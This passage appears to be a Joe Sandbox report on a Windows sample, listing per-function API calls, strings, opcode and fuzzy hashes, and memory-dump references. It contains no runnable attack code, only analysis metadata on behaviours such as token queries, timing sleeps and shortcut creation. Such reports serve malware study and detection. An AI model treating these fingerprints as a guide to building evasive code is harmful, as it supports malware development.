                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: MessageSend$__itow$_memmove
                                                • String ID:
                                                • API String ID: 2983881199-0
                                                • Opcode ID: eda0d075e0a578aa720f6f13a565ad2a07c1daad6548e9b3916764e1ddbf5ba8
                                                • Instruction ID: 8b4feb4239ff2c83cb2ab86396b48666950b2ccc1bf5e21ab615720ec8159799
                                                • Opcode Fuzzy Hash: eda0d075e0a578aa720f6f13a565ad2a07c1daad6548e9b3916764e1ddbf5ba8
                                                • Instruction Fuzzy Hash: BF21B331700218EBDF20AA649C8DFAE7BA8EF59710F04406DFA04E7291DA788D41D795
                                                Function 007E5B63 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindow.USER32(00000000), ref: 007E5B84
                                                • GetForegroundWindow.USER32 ref: 007E5B9B
                                                • GetDC.USER32(00000000), ref: 007E5BD7
                                                • GetPixel.GDI32(00000000,?,00000003), ref: 007E5BE3
                                                • ReleaseDC.USER32(00000000,00000003), ref: 007E5C1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ForegroundPixelRelease
                                                • String ID:
                                                • API String ID: 4156661090-0
                                                • Opcode ID: 2590bc6cfbbfc9f0f4b0995c2c1b3031e013b7bc8ab0947f3414eebf43bb521c
                                                • Instruction ID: da5db9e29610f1d690bc9d0542fd964e214fdde65e1a1202ecdfb210f4a66076
                                                • Opcode Fuzzy Hash: 2590bc6cfbbfc9f0f4b0995c2c1b3031e013b7bc8ab0947f3414eebf43bb521c
                                                • Instruction Fuzzy Hash: B1214C75A01504EFDB14EF69CC88AAAB7E5EF48310B14C479E94AD7262DA38AD00CB54
                                                Function 007712F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0077134D
                                                • SelectObject.GDI32(?,00000000), ref: 0077135C
                                                • BeginPath.GDI32(?), ref: 00771373
                                                • SelectObject.GDI32(?,00000000), ref: 0077139C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ObjectSelect$BeginCreatePath
                                                • String ID:
                                                • API String ID: 3225163088-0
                                                • Opcode ID: 1abd524a8581d6f9fb4aa6c96d067dfc3b7cd54333a737e1398657aa624fbd24
                                                • Instruction ID: 2569f51965d8364673f0c6300616e068ba931b2cb8c22ad07fdfbf4c37cfa608
                                                • Opcode Fuzzy Hash: 1abd524a8581d6f9fb4aa6c96d067dfc3b7cd54333a737e1398657aa624fbd24
                                                • Instruction Fuzzy Hash: D5218030800608EFDF109F29DC04B6A7BE8FB807A1F54CA36F818965B1DB799891DF94
                                                Function 007D4B3A Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 007D4B61
                                                • __beginthreadex.LIBCMT ref: 007D4B7F
                                                • MessageBoxW.USER32(?,?,?,?), ref: 007D4B94
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007D4BAA
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007D4BB1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                • String ID:
                                                • API String ID: 3824534824-0
                                                • Opcode ID: 2f43f50cc0a5f9dd9a828bb81ee2c633c4c68cfc9a7de64104994cf44fd15ba5
                                                • Instruction ID: 52becf843c30f96d9658868c0335182eecafa8f7d414679987230aef257065f3
                                                • Opcode Fuzzy Hash: 2f43f50cc0a5f9dd9a828bb81ee2c633c4c68cfc9a7de64104994cf44fd15ba5
                                                • Instruction Fuzzy Hash: 6D11E5B2905608ABCB109BA8DC08AAB7FBCEB55320F144266F814D3351D679C90087A1
                                                Function 007C852A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8546
                                                • GetLastError.KERNEL32(?,007C800A,?,?,?), ref: 007C8550
                                                • GetProcessHeap.KERNEL32(00000008,?,?,007C800A,?,?,?), ref: 007C855F
                                                • HeapAlloc.KERNEL32(00000000,?,007C800A,?,?,?), ref: 007C8566
                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C857D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                • Opcode ID: cd7f32b4e21e020fe33c130085f370b1cdc7e2a80dd8a0bfe0dc92c1803ee1f6
                                                • Instruction ID: 04db12a3893825c0b88a59c7bd938513c821dd816408399de8ea349cf9447f32
                                                • Opcode Fuzzy Hash: cd7f32b4e21e020fe33c130085f370b1cdc7e2a80dd8a0bfe0dc92c1803ee1f6
                                                • Instruction Fuzzy Hash: 16014B75240208EFDB214FA6EC88D6B7BACEF8A355714453EF909C2220DE768D10CA61
                                                Function 007D52EB Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5307
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5315
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D531D
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5327
                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5363
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: bf1e43ed4688ba0b7f90a0a2f9de962902ef1bc58952899c29b0d67b70bbafb6
                                                • Instruction ID: d0f057d067db0af5ac3176bc3909eb1378974114953d858a646468f4e1443b84
                                                • Opcode Fuzzy Hash: bf1e43ed4688ba0b7f90a0a2f9de962902ef1bc58952899c29b0d67b70bbafb6
                                                • Instruction Fuzzy Hash: 0B016932C01A1DDBCF00AFA4E8889EDBB78FF08351F06455AE941F2240CF789954C7A5
                                                Function 007C7432 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?,?,007C777D), ref: 007C744F
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C746A
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C7478
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?), ref: 007C7488
                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C7494
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: abf92fa03b7af06dd5b1e38356d48f6dd42ad7a2ec325e7450b0e7b92e292bda
                                                • Instruction ID: 8181a4db73feddeb71f9552021f148f52f7db8a41dc0cffa7c228c750a2f1947
                                                • Opcode Fuzzy Hash: abf92fa03b7af06dd5b1e38356d48f6dd42ad7a2ec325e7450b0e7b92e292bda
                                                • Instruction Fuzzy Hash: 75015E72601204BBDB185F64DC44FAA7FADEF447A2F14802CF908D2220DB39DE40EBA0
                                                Function 007C83D1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C83E8
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C83F2
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8401
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8408
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C841E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 21a337cf1c4f30ac37b788f1598c981dae17a366169b600bf23cd5637a72ef12
                                                • Instruction ID: 8696f08a039742beb4e3113d12f3dfb557e27108b9e9ce4063af4be70321e678
                                                • Opcode Fuzzy Hash: 21a337cf1c4f30ac37b788f1598c981dae17a366169b600bf23cd5637a72ef12
                                                • Instruction Fuzzy Hash: 8AF04931204206FFEB105FA5EC89F7B3BACEF89754B00842DF949C6250CE699D41DA65
                                                Function 007C8432 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8449
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8453
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8462
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8469
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C847F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 7041cd43e6fc7bc4173e2813b46a5e125784a94a3bdb9d088378aca785c2d818
                                                • Instruction ID: 4ad5d94486361c0f4a5a13d96de48ac292e24bac643c19f420f068a8405ce314
                                                • Opcode Fuzzy Hash: 7041cd43e6fc7bc4173e2813b46a5e125784a94a3bdb9d088378aca785c2d818
                                                • Instruction Fuzzy Hash: A2F04931200209AFEB611FA5EC88F7B3BACEF89754B04412DF949C7250CE699E41DB65
                                                Function 007CC4A5 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CC4B9
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 007CC4D0
                                                • MessageBeep.USER32(00000000), ref: 007CC4E8
                                                • KillTimer.USER32(?,0000040A), ref: 007CC504
                                                • EndDialog.USER32(?,00000001), ref: 007CC51E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 191622e83375f37eabfcee0b72e6bc5fea09df3cbd081b65c48524340af58f0c
                                                • Instruction ID: 428a1b2d03a68c975ab2ecc2d454234e4e04b24d658340b15b6c1f048f2146b7
                                                • Opcode Fuzzy Hash: 191622e83375f37eabfcee0b72e6bc5fea09df3cbd081b65c48524340af58f0c
                                                • Instruction Fuzzy Hash: F2016230500704ABEB255B20ED4EFA67BB8FF00B06F00866DE586E14E1DFE8A954CA94
                                                Function 007713B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                • EndPath.GDI32(?), ref: 007713BF
                                                • StrokeAndFillPath.GDI32(?,?,007ABA08,00000000,?), ref: 007713DB
                                                • SelectObject.GDI32(?,00000000), ref: 007713EE
                                                • DeleteObject.GDI32 ref: 00771401
                                                • StrokePath.GDI32(?), ref: 0077141C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: 590cbb3c3399a125f2221899da746b31664a31878df0d322694450f2f0a342db
                                                • Instruction ID: 58fd07a1b62e7e252049d7bb85d5efc2226ff3a4a7fc54c61f96030b055bb91a
                                                • Opcode Fuzzy Hash: 590cbb3c3399a125f2221899da746b31664a31878df0d322694450f2f0a342db
                                                • Instruction Fuzzy Hash: D3F03730004B48EBDB115F2AEC4CB693FA5BB41366F58CA35E529880F1CB3C8995DF14
                                                Function 00782E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00790F36: std::exception::exception.LIBCMT ref: 00790F6C
                                                  • Part of subcall function 00790F36: __CxxThrowException@8.LIBCMT ref: 00790F81
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 00777BB1: _memmove.LIBCMT ref: 00777C0B
                                                • __swprintf.LIBCMT ref: 0078302D
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00782EC6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 1943609520-557222456
                                                • Opcode ID: 9ec5225ef688d1bd0dbbc681f33b588e9d236f07af978d1d3796c382ca4a6f25
                                                • Instruction ID: 959991d25f98e1c8400d6279267555811fbdc6de33baf804ccda52df8213e168
                                                • Opcode Fuzzy Hash: 9ec5225ef688d1bd0dbbc681f33b588e9d236f07af978d1d3796c382ca4a6f25
                                                • Instruction Fuzzy Hash: 57918F71108201DFCB18FF28D899D6EB7A5EF85750F00891DF5859B2A1DB78EE04CB92
                                                Function 007DB9C7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                • CoInitialize.OLE32(00000000), ref: 007DBA47
                                                • CoCreateInstance.OLE32(00802D6C,00000000,00000001,00802BDC,?), ref: 007DBA60
                                                • CoUninitialize.OLE32 ref: 007DBA7D
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                • String ID: .lnk
                                                • API String ID: 2126378814-24824748
                                                • Opcode ID: 3f9e1743d19f219ebe8bbb773b2e3475c68f6d6bd178e7a9f15c587bffc851d6
                                                • Instruction ID: 864fa7e3cda31a43267a42ebefa6382301afdd344d71c4dbcd917dfbed9c474d
                                                • Opcode Fuzzy Hash: 3f9e1743d19f219ebe8bbb773b2e3475c68f6d6bd178e7a9f15c587bffc851d6
                                                • Instruction Fuzzy Hash: 3DA14374604201DFCB00DF14C888D2ABBE5FF88324F158999F99A9B3A1CB39EC45CB91
                                                Function 0079518D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0079521D
                                                  • Part of subcall function 007A0270: __87except.LIBCMT ref: 007A02AB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: defec58d29dcad42d8765d1a15bc13bcd6608a277363c5a1ad9248e7aa788700
                                                • Instruction ID: 994d62c3b3ab5b7996ba69abb83bd2f633c4d9bfe26617779a47cfdac24c4613
                                                • Opcode Fuzzy Hash: defec58d29dcad42d8765d1a15bc13bcd6608a277363c5a1ad9248e7aa788700
                                                • Instruction Fuzzy Hash: 57515861E0DA01D7DF12AB24E94537E2B94FB82710F248E58F495861E5EF3C8CC99B86
                                                Function 0079017B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #$+
                                                • API String ID: 0-2552117581
                                                • Opcode ID: 0db7a3b5e823f0b700cd6ed84eec597b757db4a4f5c8dcb60041858e0b3d458d
                                                • Instruction ID: ed099044cce074885fadc805b197393b4653463ae29d2b37b7b2d16ef3946a22
                                                • Opcode Fuzzy Hash: 0db7a3b5e823f0b700cd6ed84eec597b757db4a4f5c8dcb60041858e0b3d458d
                                                • Instruction Fuzzy Hash: 3B5100B5504656DFCF299F28D488BFA7BA4FF15310F14805DEC919B2A0C739AC82CBA0
                                                Function 00783297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove$_free
                                                • String ID: Oax
                                                • API String ID: 2620147621-2797580295
                                                • Opcode ID: ab1b2f70a645323fa154174f046001056899afbe4bb2863914687dfe75888b9a
